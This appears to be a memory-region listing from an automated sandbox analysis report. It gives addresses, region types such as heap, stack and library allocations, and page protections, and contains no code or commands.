page read and write
26CD4A5C000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
26CD6A84000
trusted library allocation
page read and write
4CD3000
heap
page read and write
278E000
stack
page read and write
26CEED00000
heap
page read and write
27D86D74000
heap
page read and write
4CD3000
heap
page read and write
22248000
heap
page read and write
31AC000
heap
page read and write
26CEED82000
heap
page read and write
7DF4DF7D0000
trusted library allocation
page execute and read and write
26CEEB66000
heap
page read and write
4CD9000
heap
page read and write
A98000
heap
page read and write
665F000
heap
page read and write
2DE0000
heap
page read and write
6760000
direct allocation
page read and write
22248000
heap
page read and write
4CDC000
heap
page read and write
27D86E3E000
heap
page read and write
224B7000
heap
page read and write
2264C000
unclassified section
page execute and read and write
6663000
heap
page read and write
224B7000
heap
page read and write
4CCC000
heap
page read and write
30F5000
heap
page read and write
4EC1000
heap
page read and write
26CE65F1000
trusted library allocation
page read and write
3355000
heap
page read and write
21D5F000
stack
page read and write
27D86CF3000
heap
page read and write
7050000
trusted library allocation
page read and write
4CD4000
heap
page read and write
27D866E0000
remote allocation
page read and write
224B5000
heap
page read and write
7B81000
heap
page read and write
1E5A78F0000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
36F0000
heap
page read and write
54C0000
trusted library allocation
page read and write
6662000
heap
page read and write
4CC5000
heap
page read and write
7A40000
trusted library allocation
page execute and read and write
6FAD000
stack
page read and write
54B8000
heap
page read and write
26CD7869000
trusted library allocation
page read and write
3068000
heap
page read and write
666E000
stack
page read and write
4EC0000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
27D84DAF000
heap
page read and write
4CD3000
heap
page read and write
26CEEC25000
heap
page read and write
6662000
heap
page read and write
30F4000
heap
page read and write
52C8000
heap
page read and write
6790000
direct allocation
page read and write
90E000
stack
page read and write
52DB000
trusted library allocation
page read and write
7DAB5BB000
stack
page read and write
3040000
heap
page read and write
27D86D53000
heap
page read and write
687E000
stack
page read and write
2D67000
stack
page read and write
4CD7000
heap
page read and write
6D0E000
heap
page read and write
6D80000
trusted library allocation
page read and write
2F3D000
heap
page read and write
27D850A5000
heap
page read and write
FD7BCFF000
stack
page read and write
3270000
heap
page read and write
52C1000
heap
page read and write
FD7B8FF000
stack
page read and write
30F5000
heap
page read and write
56B0000
trusted library allocation
page read and write
9A4000
heap
page read and write
27D84D3A000
heap
page read and write
27D86BDC000
heap
page read and write
30F5000
heap
page read and write
4EF9000
heap
page read and write
C54000
heap
page read and write
27D86CDE000
heap
page read and write
56B0000
trusted library allocation
page read and write
225E3000
unclassified section
page execute and read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
53B1000
heap
page read and write
7DAB4BF000
stack
page read and write
27D86CE8000
heap
page read and write
4F40000
heap
page read and write
4CCE000
heap
page read and write
26CEEB68000
heap
page read and write
3670000
trusted library allocation
page read and write
27D84CF0000
heap
page read and write
27D86D80000
heap
page read and write
30F0000
heap
page read and write
4F47000
heap
page read and write
27D86D2F000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
2DC0000
heap
page read and write
30F4000
heap
page read and write
27D84DDB000
heap
page read and write
54C0000
trusted library allocation
page read and write
2203F000
stack
page read and write
3354000
heap
page read and write
4ED9000
heap
page read and write
2620000
heap
page read and write
69E0000
direct allocation
page read and write
222C2000
heap
page read and write
52C1000
heap
page read and write
36F9000
heap
page read and write
6661000
heap
page read and write
4CCC000
heap
page read and write
27D84D2F000
heap
page read and write
7BA3000
heap
page read and write
4271000
trusted library allocation
page read and write
6E40000
trusted library allocation
page execute and read and write
30F4000
heap
page read and write
4CD4000
heap
page read and write
27D86D3E000
heap
page read and write
222D1000
heap
page read and write
9A4000
heap
page read and write
4CC0000
heap
page read and write
2FCE000
stack
page read and write
4CC1000
heap
page read and write
69F0000
direct allocation
page read and write
4ED0000
heap
page read and write
27D86BDC000
heap
page read and write
7BAB000
heap
page read and write
224B5000
heap
page read and write
4EDB000
heap
page read and write
4CD9000
heap
page read and write
2243B000
heap
page read and write
9A4000
heap
page read and write
51C1000
heap
page read and write
27D86BC0000
heap
page read and write
36FA000
heap
page read and write
4CDB000
heap
page read and write
30F4000
heap
page read and write
27D84D87000
heap
page read and write
4A21000
heap
page read and write
26CD4BF0000
heap
page read and write
6EEB000
stack
page read and write
666C000
heap
page read and write
2690000
trusted library section
page read and write
7B20000
trusted library allocation
page execute and read and write
34FA000
heap
page read and write
1E5A7BC0000
heap
page read and write
4CC1000
heap
page read and write
4ED0000
heap
page read and write
26CEEDCC000
heap
page read and write
32BE000
stack
page read and write
4ED1000
heap
page read and write
5506D3D000
stack
page read and write
27D86D80000
heap
page read and write
3313000
heap
page read and write
36FE000
heap
page read and write
6B42000
heap
page read and write
6A30000
heap
page read and write
3354000
heap
page read and write
4ED9000
heap
page read and write
54B1000
heap
page read and write
224B7000
heap
page read and write
C54000
heap
page read and write
4CCC000
heap
page read and write
2A50000
trusted library allocation
page execute and read and write
4ED1000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
4D0E000
heap
page read and write
7DAB53E000
stack
page read and write
2E30000
heap
page read and write
22248000
heap
page read and write
45C000
system
page execute and read and write
2D4C000
stack
page read and write
4ED1000
heap
page read and write
4CD9000
heap
page read and write
5071000
heap
page read and write
4CD1000
heap
page read and write
26CD4C30000
heap
page read and write
27D86D1D000
heap
page read and write
27D84D20000
heap
page read and write
42CD000
trusted library allocation
page read and write
4D40000
heap
page read and write
4D4A000
heap
page read and write
40FE000
stack
page read and write
26CD85D2000
trusted library allocation
page read and write
27D86D6A000
heap
page read and write
56B0000
trusted library allocation
page read and write
26CD6498000
heap
page read and write
27D86D49000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2790000
heap
page readonly
7FD0000
trusted library allocation
page read and write
331C000
heap
page read and write
4EDD000
heap
page read and write
6750000
direct allocation
page read and write
26CEEB03000
heap
page read and write
4ED9000
heap
page read and write
27D86D1D000
heap
page read and write
400000
system
page execute and read and write
51C0000
heap
page read and write
26CEED08000
heap
page read and write
27D86D4B000
heap
page read and write
27D84D5B000
heap
page read and write
2AAF000
unkown
page read and write
2224A000
heap
page read and write
7FB0000
trusted library allocation
page read and write
7F9C000
stack
page read and write
473000
system
page execute and read and write
8070000
direct allocation
page read and write
C54000
heap
page read and write
56B0000
trusted library allocation
page read and write
52C9000
heap
page read and write
30F4000
heap
page read and write
4CF9000
heap
page read and write
459000
system
page execute and read and write
227A6000
direct allocation
page execute and read and write
4F57000
heap
page read and write
665F000
heap
page read and write
288B000
heap
page read and write
7BE1000
heap
page read and write
30F4000
heap
page read and write
22646000
unclassified section
page execute and read and write
224C9000
heap
page read and write
30F4000
heap
page read and write
4CD1000
heap
page read and write
9A4000
heap
page read and write
456000
system
page execute and read and write
4F39000
heap
page read and write
27D86D77000
heap
page read and write
27D86BF1000
heap
page read and write
34F9000
heap
page read and write
27D86D62000
heap
page read and write
30F4000
heap
page read and write
45CC000
remote allocation
page execute and read and write
50EF000
heap
page read and write
4CD1000
heap
page read and write
456000
system
page execute and read and write
2E0F000
stack
page read and write
4EF5000
heap
page read and write
27D86BC1000
heap
page read and write
4A4F000
stack
page read and write
34F7000
heap
page read and write
26CD84EC000
trusted library allocation
page read and write
9A4000
heap
page read and write
3120000
heap
page readonly
27D850A8000
heap
page read and write
41B000
system
page execute and read and write
68BD000
stack
page read and write
6C5E000
heap
page read and write
3354000
heap
page read and write
979000
stack
page read and write
54C0000
trusted library allocation
page read and write
A96C000
direct allocation
page execute and read and write
224B7000
heap
page read and write
55071FF000
stack
page read and write
4ED9000
heap
page read and write
4EDD000
heap
page read and write
27D86D92000
heap
page read and write
52C1000
heap
page read and write
C40000
heap
page read and write
27D86CE8000
heap
page read and write
26CD4B10000
heap
page read and write
400000
system
page execute and read and write
28AB000
heap
page read and write
4CD1000
heap
page read and write
BCC000
stack
page read and write
C50000
heap
page read and write
26CD65C0000
heap
page read and write
65E0000
heap
page read and write
27D86D2F000
heap
page read and write
27D84DDB000
heap
page read and write
26C9000
trusted library allocation
page read and write
27D84C60000
heap
page read and write
158000
stack
page read and write
26CD67F9000
trusted library allocation
page read and write
4CCF000
heap
page read and write
21C1E000
stack
page read and write
4CDD000
heap
page read and write
26CD6E05000
trusted library allocation
page read and write
2FC0000
heap
page read and write
665F000
heap
page read and write
26CD4AA7000
heap
page read and write
30F4000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
7030000
trusted library allocation
page read and write
C54000
heap
page read and write
224C9000
heap
page read and write
26CEED8B000
heap
page read and write
27D86BCC000
heap
page read and write
27D86E63000
heap
page read and write
26CD64D0000
trusted library allocation
page read and write
4CF5000
heap
page read and write
53B1000
heap
page read and write
23DE000
stack
page read and write
26CD4A59000
heap
page read and write
52C9000
heap
page read and write
8090000
direct allocation
page read and write
7EDC000
stack
page read and write
27D86E90000
heap
page read and write
224B5000
heap
page read and write
21B9F000
stack
page read and write
4EDD000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
There are 1098 hidden memdumps, click here to show them.